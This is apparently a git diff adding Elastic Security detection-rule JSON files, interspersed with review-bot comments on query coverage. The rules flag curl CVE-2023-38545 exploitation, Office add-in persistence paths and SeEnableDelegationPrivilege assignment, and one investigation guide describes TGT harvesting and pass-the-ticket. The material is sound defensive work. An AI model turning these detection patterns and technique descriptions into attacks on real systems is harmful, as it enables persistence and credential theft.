"keyword" + } + ], + "risk_score": 47, + "rule_id": "f3818c85-2207-4b51-8a28-d70fb156ee87", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 2 + }, + "id": "f3818c85-2207-4b51-8a28-d70fb156ee87_2", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_6.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_6.json new file mode 100644 index 00000000000..a71ee1d3b5f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_6.json 
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule is triggered when a URL indicator from the Threat Intel Filebeat module or integrations has a match against an event that contains URL data, like DNS events, network logs, etc.", + "from": "now-65m", + "index": [ + "auditbeat-*", + "endgame-*", + "filebeat-*", + "logs-*", + "packetbeat-*", + "winlogbeat-*" + ], + "interval": "1h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Threat Intel URL Indicator Match", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index.\n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path 
WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "url.full:*\n", + "references": [ + "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", + "https://www.elastic.co/guide/en/security/master/es-threat-intel-integrations.html", + "https://www.elastic.co/security/tip" + ], + "required_fields": [ + { + "ecs": true, + "name": "url.full", + "type": "wildcard" + } + ], + "risk_score": 99, + "rule_id": "f3e22c8b-ea47-45d1-b502-b57b6de950b3", + "setup": "## Setup\n\nThis rule needs threat intelligence indicators to work.\nThreat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration),\nthe [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration),\nor a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).\n", + "severity": "critical", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Rule Type: Indicator Match" + ], + "threat_filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.category", + "negate": false, + "params": { + "query": "threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.category": "threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.kind", + 
"negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.type", + "negate": false, + "params": { + "query": "indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.type": "indicator" + } + } + } + ], + "threat_index": [ + "filebeat-*", + "logs-ti_*" + ], + "threat_indicator_path": "threat.indicator", + "threat_language": "kuery", + "threat_mapping": [ + { + "entries": [ + { + "field": "url.full", + "type": "mapping", + "value": "threat.indicator.url.full" + } + ] + }, + { + "entries": [ + { + "field": "url.original", + "type": "mapping", + "value": "threat.indicator.url.original" + } + ] + } + ], + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", + "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", + "timeline_title": "Generic Threat Match Timeline", + "timestamp_override": "event.ingested", + "type": "threat_match", + "version": 6 + }, + "id": "f3e22c8b-ea47-45d1-b502-b57b6de950b3_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_5.json b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_5.json new file mode 100644 index 00000000000..095c1e29732 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_5.json 
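Review bot: The `query` of f3e22c8b-…_6.json is `url.full:*`, so a source event that carries only `url.original` is never a candidate and the second `threat_mapping` entry (`url.original` → `threat.indicator.url.original`) can only fire on documents that also have `url.full`; `threat_query` likewise requires `threat.indicator.url.full:*`, which drops indicators that populate only `url.original`. If both mappings are meant to be live, widen them to `"query": "url.full:* or url.original:*\n"` and to `threat.indicator.url.full:* or threat.indicator.url.original:*` in `threat_query`. The `OS: Windows` tag also reads as inconsistent with an index list spanning auditbeat, packetbeat and generic `logs-*`, since an indicator match is not OS-specific. In the investigation guide, "Check the reputation of the IP address" under a URL indicator presumably means the URL's host or domain.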
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential curl CVE-2023-38545 Exploitation", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) > 255 and \nnot process.parent.name in (\"cf-agent\", \"agent-run\", \"agent-check\", \"rudder\", \"agent-inventory\", \"cf-execd\") and\nnot process.args == \"/opt/rudder/bin/curl\"\n", + "references": [ + "https://curl.se/docs/CVE-2023-38545.html", + "https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/", + "https://twitter.com/_JohnHammond/status/1711986412554531015" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + 
}, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.env_vars", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f41296b4-9975-44d6-9486-514c6f635b2d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nElastic Defend integration does not collect environment variable logging by default.\nIn order to capture this behavior, this rule requires a specific configuration option set within the advanced settings of the Elastic Defend integration.\n #### To set up environment variable capture for an Elastic Agent policy:\n- Go to \u201cSecurity \u2192 Manage \u2192 Policies\u201d.\n- Select an \u201cElastic Agent policy\u201d.\n- Click \u201cShow advanced settings\u201d.\n- Scroll down or search for \u201clinux.advanced.capture_env_vars\u201d.\n- Enter the names of environment variables you want to capture, separated by commas.\n- For this rule the linux.advanced.capture_env_vars variable should be set to \"http_proxy,HTTPS_PROXY,ALL_PROXY\".\n- Click \u201cSave\u201d.\nAfter saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly.\nFor more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": 
"https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "f41296b4-9975-44d6-9486-514c6f635b2d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_107.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_107.json new file mode 100644 index 00000000000..89ce9060bb7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_107.json 
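Review bot: The `process.env_vars` clause in f41296b4-…_5.json matches `http_proxy`, `HTTPS_PROXY` and `ALL_PROXY` with the case-insensitive `:` operator, but the setup text tells operators to set `linux.advanced.capture_env_vars` to exactly `"http_proxy,HTTPS_PROXY,ALL_PROXY"`; curl also honours the lowercase `https_proxy` and `all_proxy` forms, so if the capture list is case-sensitive those variants are never collected and the env-var branch stays silent for them. Listing both spellings in the setup guidance, `http_proxy,https_proxy,HTTPS_PROXY,all_proxy,ALL_PROXY`, would close that gap; I cannot confirm from this hunk how the capture option treats case. The `length(process.command_line) > 255` threshold is applied to the whole command line rather than to the proxied hostname the CVE is about, so long but benign invocations through a SOCKS5 proxy (many `-H`/`-d` arguments) will also trigger; a sentence in the description saying so would set expectations for tuning.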
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Microsoft Office AddIns", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"wll\",\"xll\",\"ppa\",\"ppam\",\"xla\",\"xlam\") and\n file.path :\n (\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\Startup\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\AddIns\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel\\\\XLSTART\\\\*\"\n )\n", + "references": [ + "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + 
"severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/", + "subtechnique": [ + { + "id": "T1137.006", + "name": "Add-ins", + "reference": "https://attack.mitre.org/techniques/T1137/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_108.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_108.json new file mode 100644 index 00000000000..587ce2938b3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_108.json 
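Review bot: The `file.path` patterns in f44fa4b6-…_107.json (and unchanged in the _108 revision) are anchored to the literal drive prefix `C:\\Users\\*`, so hosts whose user profiles live on another drive or a relocated `%USERPROFILE%` produce no match even though the add-in drop is otherwise identical; many sibling Windows rules use a drive wildcard instead, e.g. `"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\Startup\\\\*"`. The _108 revision only narrows `index` from `logs-endpoint.events.*` to `logs-endpoint.events.file-*`, which fits the `file where` query and otherwise leaves the rule unchanged.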
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Microsoft Office AddIns", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"wll\",\"xll\",\"ppa\",\"ppam\",\"xla\",\"xlam\") and\n file.path :\n (\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\Startup\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\AddIns\\\\*\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel\\\\XLSTART\\\\*\"\n )\n", + "references": [ + "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + 
"severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/", + "subtechnique": [ + { + "id": "T1137.006", + "name": "Add-ins", + "reference": "https://attack.mitre.org/techniques/T1137/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_110.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_110.json new file mode 100644 index 00000000000..67410af8812 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_110.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the assignment of the SeEnableDelegationPrivilege sensitive \"user right\" to a user. The SeEnableDelegationPrivilege \"user right\" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Sensitive Privilege SeEnableDelegationPrivilege assigned to a User", + "note": "## Triage and analysis\n\n### Investigating Sensitive Privilege SeEnableDelegationPrivilege assigned to a User\n\nKerberos delegation is an Active Directory feature that allows user and computer accounts to impersonate other accounts, act on their behalf, and use their privileges. Delegation (constrained and unconstrained) can be configured for user and computer objects.\n\nEnabling unconstrained delegation for a computer causes the computer to store the ticket-granting ticket (TGT) in memory at any time an account connects to the computer, so it can be used by the computer for impersonation when needed. Risk is heightened if an attacker compromises computers with unconstrained delegation enabled, as they could extract TGTs from memory and then replay them to move laterally on the domain. If the attacker coerces a privileged user to connect to the server, or if the user does so routinely, the account will be compromised and the attacker will be able to pass-the-ticket to privileged assets.\n\nSeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a domain controller and is managed through Group Policy. This setting is named **Enable computer and user accounts to be trusted for delegation**.\n\nIt is critical to control the assignment of this privilege. 
A user with this privilege and write access to a computer can control delegation settings, perform the attacks described above, and harvest TGTs from any user that connects to the system.\n\n#### Possible investigation steps\n\n- Investigate how the privilege was assigned to the user and who assigned it.\n- Investigate other potentially malicious activity that was performed by the user that assigned the privileges using the `user.id` and `winlog.activity_id` fields as a filter during the past 48 hours.\n- Investigate other alerts associated with the users/host during the past 48 hours.\n\n### False positive analysis\n\n- The SeEnableDelegationPrivilege privilege should not be assigned to users. If this rule is triggered in your environment legitimately, the security team should notify the administrators about the risks of using it.\n\n### Related rules\n\n- KRBTGT Delegation Backdoor - e052c845-48d0-4f46-8a13-7d0aba05df82\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Remove the privilege from the account.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.action:\"Authorization Policy Change\" and event.code:4704 and\n winlog.event_data.PrivilegeList:\"SeEnableDelegationPrivilege\"\n", + "references": [ + "https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_alert_active_directory_user_control.yml", + "https://twitter.com/_nwodtuhs/status/1454049485080907776", + "https://www.thehacker.recipes/ad/movement/kerberos/delegations", + 
"https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0105_windows_audit_authorization_policy_change.md" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.PrivilegeList", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", + "setup": "## Setup\n\nThe 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + 
"type": "query", + "version": 110 + }, + "id": "f494c678-3c33-43aa-b169-bb3d5198c41d_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_5.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_5.json new file mode 100644 index 00000000000..6f87626e320 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_5.json 
